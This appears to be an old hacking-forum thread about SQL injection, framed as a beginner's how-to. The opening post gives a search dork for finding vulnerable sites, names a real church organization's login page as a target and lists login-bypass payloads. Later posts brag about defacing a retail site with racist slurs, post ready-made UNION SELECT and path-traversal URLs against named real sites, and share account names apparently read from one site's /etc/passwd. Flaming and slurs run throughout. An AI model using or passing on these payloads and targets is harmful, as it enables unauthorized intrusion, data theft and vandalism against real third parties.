sql injections are a joke

all this does is trick the server into running some code in the password field that appears you have the correct password ie 1=1 or a=a
the website then believes you have the right password, instead of comparing the two passwords to see if they are identical it takes the statement 1=1 and since that is true it lets you in

google inurl:index.asp
for possibly vunerable websites

then to log in try injecting different code

i will use the churches of kenya site as an example
http://www.ncck.org/*****/login.asp?check=false
go to the login
type *****
then in the password field try different sql lines from below
if you get an error message when you enter the line that means the website is vunerable so keep trying untill you get it

here is the list
' or 'a'='a
' or 1=1--
" or 1=1--
" or "a"="a
or 1=1--
') or ('a'='a

have fun


http://img146.imageshack.us/img146/2889/ownedri6.jpg

lol pwned that site

haha ya it is easy

i've been wanting to know how sql works. if i'd known it was so simple i would have tried it ages ago

I tried it on the churches kenya website but when i tried to go to the forum it said the host was locked.

did you have this problem?

no lol maybe they got tired of people doing it lol

i used
hi' or 'a'='a

ok um... what?

never tried sql injections... run me thru it?

it tricks the server into thinking that the password is correct because the statement you send it is true

scriptkiddies >:>

how am i a skiddie?
am i using code i do not understand?
am i running programs made by others that i do not understand?
before you flame at least gather some proof

I deleted everyone's post with <noembed>...

lol why would you do such a thing

That was a while ago though...

wow probably gonna get flamed for this one...but how do you bring up a administrators login from the webpage?

wow probably gonna get flamed for this one...but how do you bring up a administrators login from the webpage?

If you have the slightest hint that what you're asking will 'get you flamed', don't ask it, and try to do some problem solving yourself.

Depending on the server software and what website software is running, there could be thousands of way to get to an "***** login".

If you have the slightest hint that what you're asking will 'get you flamed', don't ask it, and try to do some problem solving yourself.

Depending on the server software and what website software is running, there could be thousands of way to get to an "***** login".


ya i did some searching, i found some javascript injections and some .php add-ons, they dont really work but whatever....

What site?

odds are they do work.. you are just doing it wrong

If you actually look at the figures and do some statistical analysis... odds are you're just an idiot.

man...i wrote like a four or five page article about sql injection on here once, this is nothing compared to what you CAN do with sql injection. they're not a joke, and many of the finer aspects of sql injection are nowhere in your definition of them.

yes i did not include ANYTHING other than just getting into a password on little vulnerable sites, but see people are having problems with this lol imagine if i posted something above grade 9 level

So let me get this straight before i try anything
i just go to login type ***** 5times then in password i type
` OR "1=1' or something close and i will be in ?
ty for the Post Deathlord

Meh.. You get in IF its vulnerable to it.. Also theres shit load of SQl injection strings available.. Also thats just the simple 1..

Dubstep, sql injection isn't just a means of getting in, at it's best, it can be used to control whole web servers, changing fields, tables, and recording vital data. If you were to do what you were talking about (' or '1'='1 and others alike), you would be mocked for missing a great chance to record TONS of info. So yeah, cuddles, as he said, wrote a giant SQL injection tutorial once, but it's all gone. Just read up, some really interesting stuff on the topic is all over the place to be found.

okie ty for the info :)

Check out SQLMap. It's in BT3. The whole ' or 1=1-- is a joke. Most SQL servers are patched up. POST and GET methods are where its at. JS Injection (aka. XXS) is really usefull. Just cookie editing. There are alot of good Firefox addons that help with XXS. Check out Tamper Data.

Check out SQLMap. It's in BT3. The whole ' or 1=1-- is a joke. Most SQL servers are patched up. POST and GET methods are where its at. JS Injection (aka. XXS) is really usefull. Just cookie editing. There are alot of good Firefox addons that help with XXS. Check out Tamper Data.

Most post and get lines deal with SQL, so it's a good idea to learn basic SQL injection, but also advanced SQL injection. And it's XSS, not XXS.

Most post and get lines deal with SQL, so it's a good idea to learn basic SQL injection, but also advanced SQL injection. And it's XSS, not XXS.

Yeah my bad cross site scripting i knew that. The POST and GET is good sql injection for forums and such. For privilege escalation XSS is good.

Check out SQLMap. It's in BT3. The whole ' or 1=1-- is a joke. Most SQL servers are patched up. POST and GET methods are where its at. JS Injection (aka. XXS) is really usefull. Just cookie editing. There are alot of good Firefox addons that help with XXS. Check out Tamper Data.

clearly i did not post this as an advanced guide... but how is it a joke? i showed it working...

I'm saying its pretty much useless now.

it pretty much still works.

Your both right, and wrong. (Depends if you're a glass half empty, glass half full kind of person.) It does still work. And it's sort of useless in the sense that there is so much else that you can do with the usage of SQL injections that it would be wasteful and an outright shame to do a simple ' or 1=1-- on something that is wide open to the more colorful, interesting side of SQL.

Yeah i get you. But most people who run web servers know what they are doing. Updates and patches fix all that basic SQL injection. Unless you find some foreign shit. I used to do it to this site called sareeworld.com, which sells these indian robes called sarees and i used to go and change the color names to shit like Nigger Shit Brown, Period Blood Red... shit like that, twas funny.

And that shows how old you are...

yeah i get you. But most people who run web servers know what they are doing. Updates and patches fix all that basic sql injection. Unless you find some foreign shit. i used to do it to this site called sareeworld.com, which sells these indian robes called sarees and i used to go and change the color names to shit like nigger shit brown, period blood red... Shit like that, twas funny.
1234567890

dont post in my threads fucker

dont post in my threads fucker

Dude you just sitting there trying to make fun of my maturity level just got fucked. So now you resort to dont post in my threads fucker

wow.

dont post in the threads fucker

post post post

what an ass...

what an ass...

What a tool. Find some shit that you have to prove my CPU and SQL db access wrong then talk to me.

I did but you ignored me.

we have you ignored it. dog could you ban him from posting? he is ruining my shit even tho its not impressive he is annoying the shit out of me

agreed....

Your idea of proving me wrong is talking about how hardrives is whats used for h4x0r5. Idiot. YOUR WRONG?

sigh i never said an HDD was the only thing a computer needs to run, show me were i said that.

actually, no, it wasn't... Nice try though...

I was being facetious.

good job spelling there...

HAHAHA way to try and cover your ass when you looked like a dumb ass

yup...........

lol? I knew you didnt say your hd was the key to hacking. You were just saying shit about you cant program without it. You cant even run a computer without some type of storage because that means no OS. You can program anything if you have an OS but your OS is stored on you hd but the cpu is what runs it.

no one is saying a Central PROCESSING Unit doesnt processing anything..

Yeah it processes everything. And thats what I'm trying to say but your saying all kinds of shit for the sake of contradiction.

go read your thread.... if you actually read it you will realize you are wrong...

ok im not really sure how to do any of this, will it work for any site? or just really vulnerable ones? please send messages shjowing more detail to me! thanks!

Why don't you actually go study instead of ask people for handouts.

i have tried that but i dont really understand it, its like trying to say study without a textbook?

LEARN SQL then come back, i explained it the easiest possible way

Thanks death...

OK! i will do exactly that!!! haha wats a good site to test on?

Make your own.... To simple

Are you fucking kidding me? Why don't you get the fuck lost man. If you can't figure out some simple shit like that, you've got no business attempting SQLi.

But just for the sake of others having an easy SQLi to play with, here you go.
http://www.learnbirdsongs.com/birdsong.php?id=null%20union%20all%20select%201,2, 3,4,5,6,7,8,9--

Now go have some fun, research, and don't ask any more stupid questions.

KTHXBAI

And hell, while I'm bored, here's an LFI (Local File Include ) vulnerability to play with:
http://www.phishows.com/jinzora2/index.php?op=1&name=../../../../../../../../../etc/passwd
Make sure to add a null byte to the end of that url. And don't ask me what a null byte is....
The first person to get that LFI correct, and post the name of the first user account here, will get another SQLi vulnerability as a prize. Yay for them.

its not simple if you dont know it! duh hahaha and i already got it down, now im just practicing and building some basic skill on dif. sites

daemon is the administrator account

Majordomo:/usr/lib/majordomo:/bin/false postgres:x:32:32:PostgreSQL administrator